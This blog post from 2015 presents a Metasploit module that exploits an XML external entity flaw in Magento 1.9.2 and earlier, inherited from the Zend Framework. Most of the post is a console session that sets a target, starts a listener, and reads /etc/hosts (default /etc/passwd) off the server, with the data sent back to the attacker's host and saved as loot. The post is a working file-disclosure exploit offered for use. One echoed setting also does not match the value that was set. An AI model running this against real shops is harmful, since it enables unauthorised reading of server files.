Saturday 14 November 2015

XML External Entity Injection vulnerability in Magento


This module abuses an XML External Entity Injection vulnerability in Magento <= 1.9.2. More precisely, the vulnerability is in the Zend Framework.
In short, the Zend Framework XXE vulnerability stems from an insufficient sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP applications. By using certain multibyte encodings within XML, it is possible to bypass the sanitisation and perform certain XXE attacks.
Since eBay Magento is based on Zend Framework and uses several of its XML classes, it also inherits this XXE vulnerability.  

Proof of concept : 

msf > use auxiliary/gather/magento_xxe
msf auxiliary(magento_xxe) > set RPORT 8080
RPORT => 8080
msf auxiliary(magento_xxe) > set SRVHOST 192.168.1.14
SRVHOST => 192.168.1.11
msf auxiliary(magento_xxe) > setg RHOST 192.168.1.25
RHOST => 192.168.1.25
msf auxiliary(magento_xxe) > show options

Module options (auxiliary/gather/magento_xxe):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILEPATH   /etc/passwd      yes       The filepath to read on the server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.25     yes       The target address
   RPORT      8080             yes       The target port
   SRVHOST    192.168.1.14     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base Magento directory path
   URIPATH    fetch.php        yes       The URI path to use for this exploit to get the data back
   VHOST                       no        HTTP server virtual host

msf auxiliary(magento_xxe) > set FILEPATH /etc/hosts
FILEPATH => /etc/hosts
msf auxiliary(magento_xxe) > run

[*] Using URL: http://192.168.1.14:8080/fetch.php
[*] Server started.
[*] 192.168.1.25     magento_xxe - Got an answer from the server.
[+] 192.168.1.25     magento_xxe - File /etc/hosts found and saved to path: /home/jvoisin/.msf4/loot/20151113173022_default_192.168.1.25_magento.file_682845.txt
[*] Server stopped.
[*] Auxiliary module execution completed
Posted by at No comments:
Subscribe to: Posts (Atom)